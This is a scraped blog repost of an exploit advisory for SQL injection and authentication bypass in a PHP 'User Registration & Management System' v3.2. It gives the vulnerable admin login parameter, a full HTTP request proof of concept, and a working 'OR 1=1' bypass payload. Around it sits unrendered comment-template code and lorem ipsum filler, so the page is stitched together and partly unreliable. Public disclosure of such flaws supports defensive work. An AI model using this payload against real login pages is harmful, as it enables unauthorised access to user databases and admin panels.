PHL Tech Magazine

Post: User Registration & Management System – SQLi (fixed typo)



Hi, I'm Prem. I'm professional WordPress Web Developer. I developed this website. And writing articles about Finance, Startup, Business, Marketing and Tech is my hobby.
Hope you will always get informative articles which will help you to startup your business.
If you need any kind of wordpress website then feel free to contact me at


User Registration & Management System – SQLi (fixed typo)

.:. Exploit Title > User Registration & Management System – SQLi
.:. Google Dorks .:.
.:. Date: June 18, 2024
.:. Exploit Author: bRpsd
.:. Contact: cy(at)
.:. Vendor ->
.:. Product ->
.:. Product Version -> Version 3.2
.:. DBMS -> MySQL
.:. Tested on > macOS (*nix Darwin Kernel), on local xampp
“User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us.”
Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass
Types: error-based
File: localhost/admin/index.php
Vul Parameter: USERNAME (POST)
POST PoC #1: http://tom:8080/loginsystem/admin/index.php
Host: tom
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://tom
Connection: keep-alive
Referer: http://tom/loginsystem/admin/index.php
Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a
Upgrade-Insecure-Requests: 1
Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9
Test #2 => Payload to skip authentication
username=A’ OR 1=1#&password=1&login=
302 redirect to dashboard.php
Vuln File:/loginsystem/admin/index.php
Vul Code:

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}



{{ x.ux * 1000 | date:’yyyy-MM-dd’ }} {{ x.ux * 1000 | date:’HH:mm’ }} CET+1

{{ x.comment }}

The post User Registration & Management System – SQLi (fixed typo) appeared first on DIGITALIVE.WORLD.

Lora Helmin

Lora Helmin

Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

Leave a Reply

Your email address will not be published. Required fields are marked *

Related Popular Posts

Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.